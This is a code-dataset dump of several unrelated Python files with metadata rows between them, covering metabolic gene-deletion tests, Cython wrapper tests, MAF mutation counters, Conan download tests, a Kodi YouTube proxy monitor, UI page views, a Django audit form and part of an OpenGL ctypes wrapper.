method="linear room",
processes=1,
)
# Single reaction deletion
def test_single_reaction_deletion_benchmark(model, benchmark, all_solvers):
"""Benchmark single reaction deletion."""
model.solver = all_solvers
benchmark(single_reaction_deletion, model=model, processes=1)
def test_single_reaction_deletion(model, all_solvers):
"""Test single reaction deletion."""
model.solver = all_solvers
expected_results = {
"FBA": 0.70404,
"FBP": 0.87392,
"CS": 0,
"FUM": 0.81430,
"GAPD": 0,
"GLUDy": 0.85139,
}
result = single_reaction_deletion(
model=model, reaction_list=list(expected_results), processes=1
)
for reaction, value in expected_results.items():
assert np.isclose(result.knockout[reaction].growth, value, atol=1e-05)
# Single reaction deletion ROOM
def test_single_reaction_deletion_room(room_model, room_solution, all_solvers):
"""Test single reaction deletion using ROOM."""
room_model.solver = all_solvers
expected = Series(
{
"v1": 10.0,
"v2": 5.0,
"v3": 0.0,
"v4": 5.0,
"v5": 5.0,
"v6": 0.0,
"b1": 10.0,
"b2": 5.0,
"b3": 5.0,
},
index=["v1", "v2", "v3", "v4", "v5", "v6", "b1", "b2", "b3"],
)
with room_model:
room_model.reactions.v6.knock_out()
add_room(room_model, solution=room_solution, delta=0.0, epsilon=0.0)
room_sol = room_model.optimize()
assert np.allclose(room_sol.fluxes, expected)
# Single reaction deletion linear ROOM
def test_single_reaction_deletion_linear_room(room_model, room_solution, all_solvers):
"""Test single reaction deletion using linear ROOM."""
room_model.solver = all_solvers
expected = Series(
{
"v1": 10.0,
"v2": 5.0,
"v3": 0.0,
"v4": 5.0,
"v5": 5.0,
"v6": 0.0,
"b1": 10.0,
"b2": 5.0,
"b3": 5.0,
},
index=["v1", "v2", "v3", "v4", "v5", "v6", "b1", "b2", "b3"],
)
with room_model:
room_model.reactions.v6.knock_out()
add_room(
room_model, solution=room_solution, delta=0.0, epsilon=0.0, linear=True
)
linear_room_sol = room_model.optimize()
assert np.allclose(linear_room_sol.fluxes, expected)
# Double gene deletion
def test_double_gene_deletion_benchmark(large_model, benchmark):
"""Benchmark double gene deletion."""
genes = ["b0726", "b4025", "b0724", "b0720", "b2935", "b2935", "b1276", "b1241"]
benchmark(double_gene_deletion, large_model, gene_list1=genes, processes=1)
def test_double_gene_deletion(model):
"""Test double gene deletion."""
genes = ["b0726", "b4025", "b0724", "b0720", "b2935", "b2935", "b1276", "b1241"]
growth_dict = {
"b0720": {
"b0720": 0.0,
"b0724": 0.0,
"b0726": 0.0,
"b1241": 0.0,
"b1276": 0.0,
"b2935": 0.0,
"b4025": 0.0,
},
"b0724": {
"b0720": 0.0,
"b0724": 0.814,
"b0726": 0.814,
"b1241": 0.814,
"b1276": 0.814,
"b2935": 0.814,
"b4025": 0.739,
},
"b0726": {
"b0720": 0.0,
"b0724": 0.814,
"b0726": 0.858,
"b1241": 0.858,
"b1276": 0.858,
"b2935": 0.858,
"b4025": 0.857,
},
"b1241": {
"b0720": 0.0,
"b0724": 0.814,
"b0726": 0.858,
"b1241": 0.874,
"b1276": 0.874,
"b2935": 0.874,
"b4025": 0.863,
},
"b1276": {
"b0720": 0.0,
"b0724": 0.814,
"b0726": 0.858,
"b1241": 0.874,
"b1276": 0.874,
"b2935": 0.874,
"b4025": 0.863,
},
"b2935": {
"b0720": 0.0,
"b0724": 0.814,
"b0726": 0.858,
"b1241": 0.874,
"b1276": 0.874,
"b2935": 0.874,
"b4025": 0.863,
},
"b4025": {
"b0720": 0.0,
"b0724": 0.739,
"b0726": 0.857,
"b1241": 0.863,
"b1276": 0.863,
"b2935": 0.863,
"b4025": 0.863,
},
}
solution = double_gene_deletion(model, gene_list1=genes, processes=3)
solution_one_process = double_gene_deletion(model, gene_list1=genes, processes=1)
for rxn_a, sub in growth_dict.items():
for rxn_b, growth in sub.items():
sol = solution.knockout[{rxn_a, rxn_b}]
sol_one = solution_one_process.knockout[{rxn_a, rxn_b}]
assert np.isclose(sol.growth, growth, atol=1e-3)
assert np.isclose(sol_one.growth, growth, atol=1e-3)
# Double reaction deletion
def test_double_reaction_deletion_benchmark(large_model, benchmark):
"""Benchmark double reaction deletion."""
reactions = large_model.reactions[1::100]
benchmark(double_reaction_deletion, large_model, reaction_list1=reactions)
def test_double_reaction_deletion(model):
"""Test double reaction deletion."""
reactions = ["FBA", "ATPS4r", "ENO", "FRUpts2"]
growth_dict = {
"FBA": {"ATPS4r": 0.135, "ENO": float("nan"), "FRUpts2": 0.704},
"ATPS4r": {"ENO": float("nan"), "FRUpts2": 0.374},
"ENO": {"FRUpts2": 0.0},
}
solution = double_reaction_deletion(model, reaction_list1=reactions, processes=3)
solution_one_process = double_reaction_deletion(
model, reaction_list1=reactions, processes=1
)
for (rxn_a, sub) in growth_dict.items():
for rxn_b, growth in sub.items():
sol = solution.knockout[{rxn_a, rxn_b}]
sol_one = solution_one_process.knockout[{rxn_a, rxn_b}]
if math.isnan(growth):
assert math.isnan(sol.growth)
assert math.isnan(sol_one.growth)
else:
assert np.isclose(sol.growth, growth, atol=1e-3)
assert np.isclose(sol_one.growth, growth, atol=1e-3)
def test_deletion_accessor(small_model):
"""Test the DataFrame accessor."""
single = single_reaction_deletion(small_model, small_model.reactions[0:10])
double = double_reaction_deletion(small_model, small_model.reactions[0:10])
rxn1 = small_model.reactions[0]
rxn2 = small_model.reactions[1]
with pytest.raises(ValueError):
single.knockout[1]
with pytest.raises(ValueError):
single.knockout[{"a": 1}]
assert single.knockout[rxn1].ids.iloc[0] == {rxn1.id}
assert double.knockout[{rxn1, rxn2}].ids.iloc[0] == {rxn1.id, rxn2.id}
assert all(single.knockout[rxn1.id] == single.knockout[rxn1])
assert all(double.knockout[{rxn1.id, rxn2.id}] == double.knockout[{rxn1, rxn2}])
assert single.knockout[rxn1, rxn2].shape == (2, 3)
assert double.knockout[rxn1, rxn2].shape == (2, 3)
assert double.knockout[{rxn1, rxn2}].shape == (1, 3)
assert double.knockout[{rxn1}, {rxn2}].shape == (2, 3)
| gpl-2.0 | -1,685,886,892,921,720,000 | 30.018325 | 86 | 0.571103 | false |
AlexanderFabisch/cythonwrapper | test/test_type_conversions.py | 1 | 4159 | import numpy as np
from pywrap.testing import cython_extension_from
from nose.tools import assert_equal, assert_raises
def test_bool_in_bool_out():
with cython_extension_from("boolinboolout.hpp"):
from boolinboolout import A
a = A()
b = False
assert_equal(not b, a.neg(b))
def test_double_in_double_out():
with cython_extension_from("doubleindoubleout.hpp"):
from doubleindoubleout import A
a = A()
d = 3.213
assert_equal(d + 2.0, a.plus2(d))
def test_complex_arg():
with cython_extension_from("complexarg.hpp"):
from complexarg import A, B
a = A()
b = B(a)
assert_equal(b.get_string(), "test")
def test_map():
with cython_extension_from("map.hpp"):
from map import lookup
m = {"test": 0}
assert_equal(lookup(m), 0)
def test_vector():
with cython_extension_from("vector.hpp"):
from vector import A
a = A()
v = np.array([2.0, 1.0, 3.0])
n = a.norm(v)
assert_equal(n, 14.0)
def test_string_in_string_out():
with cython_extension_from("stringinstringout.hpp"):
from stringinstringout import A
a = A()
s = "This is a sentence"
assert_equal(s + ".", a.end(s))
def test_string_vector():
with cython_extension_from("stringvector.hpp"):
from stringvector import A
a = A()
substrings = ["AB", "CD", "EF"]
res = a.concat(substrings)
assert_equal(res, "ABCDEF")
def test_complex_ptr_arg():
with cython_extension_from("complexptrarg.hpp"):
from complexptrarg import A, B
a = A()
b = B(a)
assert_equal(b.get_string(), "test")
def test_factory():
with cython_extension_from("factory.hpp"):
from factory import AFactory
factory = AFactory()
a = factory.make()
assert_equal(5, a.get())
def test_primitive_pointers():
with cython_extension_from("primitivepointers.hpp"):
from primitivepointers import fun1
assert_equal(fun1(5), 6)
def test_cstring():
with cython_extension_from("cstring.hpp"):
from cstring import length, helloworld
assert_equal(length("test"), 4)
assert_equal(helloworld(), "hello world")
def test_fixed_length_array():
with cython_extension_from("fixedarray.hpp"):
from fixedarray import to_string
assert_equal(to_string([1, 2, 3, 4, 5]), "[1, 2, 3, 4, 5]")
assert_raises(ValueError, to_string, [1, 2, 3, 4])
assert_raises(TypeError, to_string, [1, 2, 3, 4, "a"])
def test_missing_default_ctor():
with cython_extension_from("missingdefaultctor.hpp", hide_errors=True):
assert_raises(ImportError, __import__, "missingdefaultctor")
def test_missing_assignment():
with cython_extension_from("missingassignmentop.hpp", hide_errors=True):
assert_raises(ImportError, __import__, "missingassignmentop")
def test_exceptions():
# A list of convertible exceptions can be found in the Cython docs:
# http://docs.cython.org/src/userguide/wrapping_CPlusPlus.html#exceptions
with cython_extension_from("throwexception.hpp"):
from throwexception import (throw_bad_alloc, throw_bad_cast,
throw_domain_error, throw_invalid_argument,
throw_ios_base_failure,
throw_out_of_range, throw_overflow_error,
throw_range_error, throw_underflow_error,
throw_other)
assert_raises(MemoryError, throw_bad_alloc)
assert_raises(TypeError, throw_bad_cast)
assert_raises(ValueError, throw_domain_error)
assert_raises(ValueError, throw_invalid_argument)
assert_raises(IOError, throw_ios_base_failure)
assert_raises(IndexError, throw_out_of_range)
assert_raises(OverflowError, throw_overflow_error)
assert_raises(ArithmeticError, throw_range_error)
assert_raises(ArithmeticError, throw_underflow_error)
assert_raises(RuntimeError, throw_other)
| bsd-3-clause | -8,130,951,337,650,966,000 | 31.24031 | 79 | 0.613369 | false |
kotoroshinoto/TCGA_MAF_Analysis | gooch_maf_tools/util/MAFcounters.py | 1 | 4909 | import os
import sys
from ..formats import MAF
__author__ = 'mgooch'
class FeatureCounter:
def __init__(self):
self.counts = dict()
self.name = None
def count(self, entry: MAF.Entry):
return 0
def __appendcount__(self, keystring):
if keystring is None:
return
if keystring in self.counts:
self.counts[keystring] += 1
else:
self.counts[keystring] = 1
def __countif__(self, keystring, condition):
if condition:
self.__appendcount__(keystring)
def __str__(self):
str_val = ""
for key in sorted(self.counts.keys()):
str_val += "%s\t%s\n" % (key, self.counts[key])
return str_val
def write_file(self, path, prefix=None):
realpath = os.path.realpath(os.path.relpath(prefix, start=path))
if self.name is not None and len(self.name) > 0:
out_file_name = ""
if prefix is not None and len(prefix) > 0:
out_file_name = os.path.realpath(os.path.relpath("%s_%s.txt" % (prefix, self.name), start=path))
#$ofname=$path.'/'.$prefix.'_'.$self->{name}.".txt";
else:
out_file_name = os.path.realpath(os.path.relpath("%s.txt" % self.name, start=path))
#$ofname=$path.'/'.$self->{name}.".txt";
# print "$ofname\n";
out_file_handler = open(out_file_name, mode='w')
out_file_handler.write("%s" % self)
out_file_handler.close()
else:
print("writeFile used on counter with no name", file=sys.stderr)
sys.exit(-1)
class GeneMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
self.__appendcount__(entry.data['Hugo_Symbol'])
class LocMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
#count according to GENE_CHROM_START_END
self.__appendcount__("%s|%s|%s|%s" % (entry.data['Hugo_Symbol'], entry.data['Chrom'], entry.data['Start_Position'], entry.data['End_Position']))
def __str__(self):
str_rep = "GENE_SYMBOL\tCHROM\tSTART\tEND\tCOUNT\n"
for item in self.counts:
str_rep += "%s\t%d" % (item.replace("|", "\t"), self.counts[item])
str_rep += "\n"
return str_rep
class SampMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
self.__appendcount__(entry.data['Tumor_Sample_Barcode'])
# self.__appendcount__(entry.Tumor_Sample_UUID)
class MutTypeCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
self.__appendcount__(mut_type)
class MutTypeAtLocCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
self.__appendcount__("%s|%s|%s|%s|%s|%s|%s" % (entry.data['Hugo_Symbol'], entry.data['Chrom'], entry.data['Start_Position'], entry.data['End_Position'], entry.data['Variant_Type'], entry.data['Variant_Classification'], mut_type))
def __str__(self):
str_rep = "GENE_SYMBOL\tCHROM\tSTART\tEND\tMUT_TYPE\tVARIANT_TYPE\tVARIANT_CLASS\tCOUNT\n"
for item in self.counts:
str_rep += "%s\t%d" % (item.replace("|", "\t"), self.counts[item])
str_rep += "\n"
return str_rep
class MutTypePerSampCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
combin_str = "%s_|_%s" % (entry.data['Tumor_Sample_Barcode'], mut_type)
self.__appendcount__(combin_str)
@staticmethod
def prep_nuc_key_list():
nuc_characters = list("ACTG")
combo_keys = list()
for nuc1 in nuc_characters:
for nuc2 in nuc_characters:
if nuc1 != nuc2:
combo_keys.append(("%s_%s" % (nuc1, nuc2)))
combo_keys.append(("-_%s" % nuc1))
combo_keys.append(("%s_-" % nuc1))
combo_keys.append("MNC")
return combo_keys
@staticmethod
def initialize_sample_dictionary(sample_list):
nuc_keys = MutTypePerSampCounter.prep_nuc_key_list()
grid_dict = dict()
for sample in sample_list:
if sample not in grid_dict:
grid_dict[sample] = dict()
for key in nuc_keys:
grid_dict[sample][key] = 0
return grid_dict
def get_grid_dict(self):
samples = list()
split_entries = list()
for key in sorted(self.counts.keys()):
key_split = list(key.split('_|_'))
key_split.append(self.counts[key])
split_entries.append(key_split)
if key_split[0] not in samples:
samples.append(key_split[0])
grid_dict = MutTypePerSampCounter.initialize_sample_dictionary(samples)
for entry in split_entries:
grid_dict[entry[0]][entry[1]] = entry[2]
return grid_dict
def __str__(self):
str_val = ""
grid_dict = self.get_grid_dict()
nuc_keys = MutTypePerSampCounter.prep_nuc_key_list()
first_line = "sample_ID"
for nuc_pair in nuc_keys:
first_line += "\t" + nuc_pair
first_line += "\n"
for sample in grid_dict:
entry_str = str(sample)
for nuc_pair in nuc_keys:
entry_str += "\t" + str(grid_dict[sample][nuc_pair])
entry_str += "\n"
str_val += entry_str
# str_val += "%s\t%s\t%s\n" % (key_split[0], key_split[1], key_split[2])
return first_line + str_val
| unlicense | 4,157,340,140,636,658,700 | 30.06962 | 232 | 0.657975 | false |
conan-io/conan | conans/test/integration/command/download/download_test.py | 1 | 9237 | import os
import unittest
from collections import OrderedDict
from conans.model.ref import ConanFileReference
from conans.test.utils.tools import (TestClient, TestServer, NO_SETTINGS_PACKAGE_ID, TurboTestClient,
GenConanfile)
from conans.util.files import load
class DownloadTest(unittest.TestCase):
def test_download_recipe(self):
client = TurboTestClient(default_server_user={"lasote": "pass"})
# Test download of the recipe only
conanfile = str(GenConanfile().with_name("pkg").with_version("0.1"))
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.create(ref, conanfile)
client.upload_all(ref)
client.remove_all()
client.run("download pkg/0.1@lasote/stable --recipe")
self.assertIn("Downloading conanfile.py", client.out)
self.assertNotIn("Downloading conan_package.tgz", client.out)
export = client.cache.package_layout(ref).export()
self.assertTrue(os.path.exists(os.path.join(export, "conanfile.py")))
self.assertEqual(conanfile, load(os.path.join(export, "conanfile.py")))
conan = client.cache.package_layout(ref).base_folder()
self.assertFalse(os.path.exists(os.path.join(conan, "package")))
def test_download_with_sources(self):
server = TestServer()
servers = OrderedDict()
servers["default"] = server
servers["other"] = TestServer()
client = TestClient(servers=servers, users={"default": [("lasote", "mypass")],
"other": [("lasote", "mypass")]})
conanfile = """from conans import ConanFile
class Pkg(ConanFile):
name = "pkg"
version = "0.1"
exports_sources = "*"
"""
client.save({"conanfile.py": conanfile,
"file.h": "myfile.h",
"otherfile.cpp": "C++code"})
client.run("export . lasote/stable")
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.run("upload pkg/0.1@lasote/stable")
client.run("remove pkg/0.1@lasote/stable -f")
client.run("download pkg/0.1@lasote/stable")
self.assertIn("Downloading conan_sources.tgz", client.out)
source = client.cache.package_layout(ref).export_sources()
self.assertEqual("myfile.h", load(os.path.join(source, "file.h")))
self.assertEqual("C++code", load(os.path.join(source, "otherfile.cpp")))
def test_download_reference_without_packages(self):
client = TestClient(default_server_user=True)
client.save({"conanfile.py": GenConanfile().with_name("pkg").with_version("0.1")})
client.run("export . user/stable")
client.run("upload pkg/0.1@user/stable")
client.run("remove pkg/0.1@user/stable -f")
client.run("download pkg/0.1@user/stable")
# Check 'No remote binary packages found' warning
self.assertIn("WARN: No remote binary packages found in remote", client.out)
# Check at least conanfile.py is downloaded
ref = ConanFileReference.loads("pkg/0.1@user/stable")
self.assertTrue(os.path.exists(client.cache.package_layout(ref).conanfile()))
def test_download_reference_with_packages(self):
server = TestServer()
servers = {"default": server}
client = TurboTestClient(servers=servers, users={"default": [("lasote", "mypass")]})
conanfile = """from conans import ConanFile
class Pkg(ConanFile):
name = "pkg"
version = "0.1"
settings = "os"
"""
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.create(ref, conanfile)
client.upload_all(ref)
client.remove_all()
client.run("download pkg/0.1@lasote/stable")
package_layout = client.cache.package_layout(ref)
package_folder = os.path.join(package_layout.packages(),
os.listdir(package_layout.packages())[0])
# Check not 'No remote binary packages found' warning
self.assertNotIn("WARN: No remote binary packages found in remote", client.out)
# Check at conanfile.py is downloaded
self.assertTrue(os.path.exists(package_layout.conanfile()))
# Check package folder created
self.assertTrue(os.path.exists(package_folder))
def test_download_wrong_id(self):
client = TurboTestClient(servers={"default": TestServer()},
users={"default": [("lasote", "mypass")]})
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.export(ref)
client.upload_all(ref)
client.remove_all()
client.run("download pkg/0.1@lasote/stable:wrong", assert_error=True)
self.assertIn("ERROR: Binary package not found: 'pkg/0.1@lasote/stable:wrong'",
client.out)
def test_download_pattern(self):
client = TestClient()
client.run("download pkg/*@user/channel", assert_error=True)
self.assertIn("Provide a valid full reference without wildcards", client.out)
def test_download_full_reference(self):
server = TestServer()
servers = {"default": server}
client = TurboTestClient(servers=servers, users={"default": [("lasote", "mypass")]})
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.create(ref)
client.upload_all(ref)
client.remove_all()
client.run("download pkg/0.1@lasote/stable:{}".format(NO_SETTINGS_PACKAGE_ID))
package_layout = client.cache.package_layout(ref)
package_folder = os.path.join(package_layout.packages(),
os.listdir(package_layout.packages())[0])
# Check not 'No remote binary packages found' warning
self.assertNotIn("WARN: No remote binary packages found in remote", client.out)
# Check at conanfile.py is downloaded
self.assertTrue(os.path.exists(package_layout.conanfile()))
# Check package folder created
self.assertTrue(os.path.exists(package_folder))
def test_download_with_full_reference_and_p(self):
client = TestClient()
client.run("download pkg/0.1@user/channel:{package_id} -p {package_id}".
format(package_id="dupqipa4tog2ju3pncpnrzbim1fgd09g"),
assert_error=True)
self.assertIn("Use a full package reference (preferred) or the `--package`"
" command argument, but not both.", client.out)
def test_download_with_package_and_recipe_args(self):
client = TestClient()
client.run("download eigen/3.3.4@conan/stable --recipe --package fake_id",
assert_error=True)
self.assertIn("ERROR: recipe parameter cannot be used together with package", client.out)
def test_download_package_argument(self):
server = TestServer()
servers = {"default": server}
client = TurboTestClient(servers=servers, users={"default": [("lasote", "mypass")]})
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.create(ref)
client.upload_all(ref)
client.remove_all()
client.run("download pkg/0.1@lasote/stable -p {}".format(NO_SETTINGS_PACKAGE_ID))
package_layout = client.cache.package_layout(ref)
package_folder = os.path.join(package_layout.packages(),
os.listdir(package_layout.packages())[0])
# Check not 'No remote binary packages found' warning
self.assertNotIn("WARN: No remote binary packages found in remote", client.out)
# Check at conanfile.py is downloaded
self.assertTrue(os.path.exists(package_layout.conanfile()))
# Check package folder created
self.assertTrue(os.path.exists(package_folder))
def test_download_not_found_reference(self):
server = TestServer()
servers = {"default": server}
client = TurboTestClient(servers=servers, users={"default": [("lasote", "mypass")]})
client.run("download pkg/0.1@lasote/stable", assert_error=True)
self.assertIn("ERROR: Recipe not found: 'pkg/0.1@lasote/stable'", client.out)
def test_no_user_channel(self):
# https://github.com/conan-io/conan/issues/6009
server = TestServer(users={"user": "password"}, write_permissions=[("*/*@*/*", "*")])
client = TestClient(servers={"default": server}, users={"default": [("user", "password")]})
client.save({"conanfile.py": GenConanfile()})
client.run("create . pkg/1.0@")
client.run("upload * --all --confirm")
client.run("remove * -f")
client.run("download pkg/1.0:{}".format(NO_SETTINGS_PACKAGE_ID))
self.assertIn("pkg/1.0: Downloading pkg/1.0:%s" % NO_SETTINGS_PACKAGE_ID, client.out)
self.assertIn("pkg/1.0: Package installed %s" % NO_SETTINGS_PACKAGE_ID, client.out)
# All
client.run("remove * -f")
client.run("download pkg/1.0@")
self.assertIn("pkg/1.0: Downloading pkg/1.0:%s" % NO_SETTINGS_PACKAGE_ID, client.out)
self.assertIn("pkg/1.0: Package installed %s" % NO_SETTINGS_PACKAGE_ID, client.out)
| mit | 2,105,040,354,864,572,400 | 43.408654 | 101 | 0.626827 | false |
repotvsupertuga/tvsupertuga.repository | plugin.video.youtube/resources/lib/youtube_plugin/kodion/utils/monitor.py | 1 | 2946 | import threading
from ..utils import get_proxy_server, is_proxy_live
import xbmc
import xbmcaddon
_addon = xbmcaddon.Addon('plugin.video.youtube')
class YouTubeMonitor(xbmc.Monitor):
def __init__(self, *args, **kwargs):
self._proxy_port = int(_addon.getSetting('kodion.mpd.proxy.port'))
self._old_proxy_port = self._proxy_port
self._use_proxy = _addon.getSetting('kodion.mpd.proxy') == 'true'
self.dash_proxy = None
self.proxy_thread = None
if self.use_proxy():
self.start_proxy()
xbmc.Monitor.__init__(self)
def onSettingsChanged(self):
_use_proxy = _addon.getSetting('kodion.mpd.proxy') == 'true'
_proxy_port = int(_addon.getSetting('kodion.mpd.proxy.port'))
if self._use_proxy != _use_proxy:
self._use_proxy = _use_proxy
if self._proxy_port != _proxy_port:
self._old_proxy_port = self._proxy_port
self._proxy_port = _proxy_port
if self.use_proxy() and not self.dash_proxy:
self.start_proxy()
elif self.use_proxy() and (self.old_proxy_port() != self.proxy_port()):
if self.dash_proxy:
self.restart_proxy()
elif not self.dash_proxy:
self.start_proxy()
elif not self.use_proxy() and self.dash_proxy:
self.shutdown_proxy()
def use_proxy(self):
return self._use_proxy
def proxy_port(self):
return int(self._proxy_port)
def old_proxy_port(self):
return int(self._old_proxy_port)
def proxy_port_sync(self):
self._old_proxy_port = self._proxy_port
def start_proxy(self):
if not self.dash_proxy:
xbmc.log('[plugin.video.youtube] DashProxy: Starting |{port}|'.format(port=str(self.proxy_port())), xbmc.LOGDEBUG)
self.proxy_port_sync()
self.dash_proxy = get_proxy_server(port=self.proxy_port())
if self.dash_proxy:
self.proxy_thread = threading.Thread(target=self.dash_proxy.serve_forever)
self.proxy_thread.daemon = True
self.proxy_thread.start()
def shutdown_proxy(self):
if self.dash_proxy:
xbmc.log('[plugin.video.youtube] DashProxy: Shutting down |{port}|'.format(port=str(self.old_proxy_port())), xbmc.LOGDEBUG)
self.proxy_port_sync()
self.dash_proxy.shutdown()
self.dash_proxy.socket.close()
self.proxy_thread.join()
self.proxy_thread = None
self.dash_proxy = None
def restart_proxy(self):
xbmc.log('[plugin.video.youtube] DashProxy: Restarting... |{old_port}| -> |{port}|'
.format(old_port=str(self.old_proxy_port()), port=str(self.proxy_port())), xbmc.LOGDEBUG)
self.shutdown_proxy()
self.start_proxy()
def ping_proxy(self):
return is_proxy_live(port=self.proxy_port())
| gpl-2.0 | -6,832,723,828,920,644,000 | 34.493976 | 135 | 0.590631 | false |
jkandasa/integration_tests | cfme/infrastructure/networking.py | 1 | 1954 | from navmazing import NavigateToAttribute
from widgetastic.widget import View
from widgetastic_patternfly import Dropdown
from cfme.base.ui import BaseLoggedInPage
from cfme.utils.appliance import Navigatable
from cfme.utils.appliance.implementations.ui import navigator, CFMENavigateStep
from widgetastic_manageiq import PaginationPane, ItemsToolBarViewSelector, Text
class InfraNetworking(Navigatable):
def __init__(self, appliance=None):
Navigatable.__init__(self, appliance)
class InfraNetworkingView(BaseLoggedInPage):
"""Base view for header and nav checking, navigatable views should inherit this"""
@property
def in_infra_networking(self):
nav_chain = ['Compute', 'Infrastructure', 'Networking']
return (
self.logged_in_as_current_user and
self.navigation.currently_selected == nav_chain)
class InfraNetworkingToolbar(View):
"""The toolbar on the main page"""
policy = Dropdown('Policy')
view_selector = View.nested(ItemsToolBarViewSelector)
class InfraNetworkingEntities(View):
"""Entities on the main page"""
title = Text('//div[@id="main-content"]//h1')
class InfraNetworkingAllView(InfraNetworkingView):
"""The "all" view -- a list"""
@property
def is_displayed(self):
return (
self.in_infra_networking and
self.entities.title.text == 'All Switches')
toolbar = View.nested(InfraNetworkingToolbar)
entities = View.nested(InfraNetworkingEntities)
paginator = PaginationPane()
@navigator.register(InfraNetworking, 'All')
class All(CFMENavigateStep):
VIEW = InfraNetworkingAllView
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self):
self.prerequisite_view.navigation.select('Compute', 'Infrastructure', 'Networking')
def resetter(self):
# Reset view and selection
self.view.toolbar.view_selector.select('Grid View')
| gpl-2.0 | 3,075,071,980,845,760,000 | 30.015873 | 91 | 0.716991 | false |
rdkls/django-audit-mongodb | djangoaudit/forms.py | 1 | 1925 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2010, 2degrees Limited <[email protected]>.
# All Rights Reserved.
#
# This file is part of djangoaudit <https://launchpad.net/django-audit/>,
# which is subject to the provisions of the BSD at
# <http://dev.2degreesnetwork.com/p/2degrees-license.html>. A copy of the
# license should accompany this distribution. THIS SOFTWARE IS PROVIDED "AS IS"
# AND ANY AND ALL EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT
# NOT LIMITED TO, THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST
# INFRINGEMENT, AND FITNESS FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
A module to store a version of django.forms.ModelForm to work with
djangoaudit.models.AuditedModel
"""
from django.forms import ModelForm
__all__ = ['AuditedModelForm']
class AuditedModelForm(ModelForm):
"""
A version of django.forms.ModelForm to allow operator and notes to be
specified to work with djangoaudit.models.AuditedModel
"""
def save(self, commit=True, operator=None, notes=None):
"""
Save the data in the form to the audited model instance.
:param commit: Whether to commit (see django docs for more info)
:type commit: :class:`bool`
:param operator: Optional operator to record against this save
:param notes: Optional notes to record against this save
"""
if not hasattr(self.instance, '_audit_info'):
raise AttributeError("Cannot save this form as the model instance "
"does not have the attribute '_audit_info'")
self.instance.set_audit_info(operator=operator, notes=notes)
super(AuditedModelForm, self).save(commit=commit) | bsd-3-clause | -479,323,673,763,812,700 | 36.764706 | 79 | 0.622338 | false |
FabriceSalvaire/PyOpenGLng | PyOpenGLng/Wrapper/CtypeWrapper.py | 1 | 33545 | ####################################################################################################
#
# PyOpenGLng - An OpenGL Python Wrapper with a High Level API.
# Copyright (C) 2014 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
"""This module implements a ctypes wrapper for OpenGL based on information provided by the OpenGL
API :class:`PyOpenGLng.GlApi`.
"""
####################################################################################################
import six
####################################################################################################
import collections
import ctypes
import logging
import os
import subprocess
import sys
import types
import numpy as np
####################################################################################################
from .PythonicWrapper import PythonicWrapper
from PyOpenGLng.Tools.Timer import TimerContextManager
import PyOpenGLng.Config as Config
import PyOpenGLng.GlApi.Getter as Getter
####################################################################################################
_module_logger = logging.getLogger(__name__)
####################################################################################################
# Fixme: unsigned comes from typedef
# not gl, but translated c type in fact
__to_ctypes_type__ = {
'char':ctypes.c_char,
'int8_t':ctypes.c_byte, # c_int8
'uint8_t':ctypes.c_ubyte, # c_uint8
'unsigned char':ctypes.c_ubyte,
'short':ctypes.c_short,
'unsigned short':ctypes.c_ushort,
'int32_t':ctypes.c_int32,
'int':ctypes.c_int32, # not 64-bit integer!
'unsigned int':ctypes.c_uint32,
'int64_t':ctypes.c_int64,
'uint64_t':ctypes.c_uint64,
'float':ctypes.c_float,
'float_t':ctypes.c_float,
'double':ctypes.c_double,
'intptr_t':ctypes.c_void_p, # ?
'ptrdiff_t':ctypes.c_void_p, # int64 ?
'ssize_t':ctypes.c_uint64, # ?
}
__numpy_to_ctypes_type__ = {
'<u1':ctypes.c_uint8,
'<u2':ctypes.c_uint16,
'<u4':ctypes.c_uint32,
'<u8':ctypes.c_uint64,
'<i1':ctypes.c_int8,
'<i2':ctypes.c_int16,
'<i4':ctypes.c_int32,
'<i8':ctypes.c_int64,
'<f4':ctypes.c_float,
'<f8':ctypes.c_double,
}
def to_ctypes_type(parameter):
""" Return the ctypes type corresponding to a parameter. """
if parameter.is_generic_pointer():
return ctypes.c_void_p
else:
c_type = str(parameter.c_type)
return __to_ctypes_type__[c_type]
def numpy_to_ctypes_type(array):
""" Return the ctypes type corresponding to a Numpy array data type. """
return __numpy_to_ctypes_type__.get(array.dtype.str, None)
####################################################################################################
__command_directives__ = {
'glShaderSource':{'length':None,},
# length = NULL for null terminated string and solve len(pointer_parameters) == 2
}
####################################################################################################
def check_numpy_type(array, ctypes_type):
""" Check the Numpy array data type is same as *ctypes_type*. """
if numpy_to_ctypes_type(array) != ctypes_type:
raise ValueError("Type mismatch: %s instead of %s" % (array.dtype, ctypes_type.__name__))
####################################################################################################
class GlEnums(object):
##############################################
def __iter__(self):
for attribute in sorted(six.iterkeys(self.__dict__)):
if attribute.startswith('GL_'):
yield attribute
####################################################################################################
class GlCommands(object):
##############################################
def __iter__(self):
# for attribute, value in self.__dict__.iteritems():
# if attribute.startswith('gl'):
# yield value
for attribute in sorted(six.iterkeys(self.__dict__)):
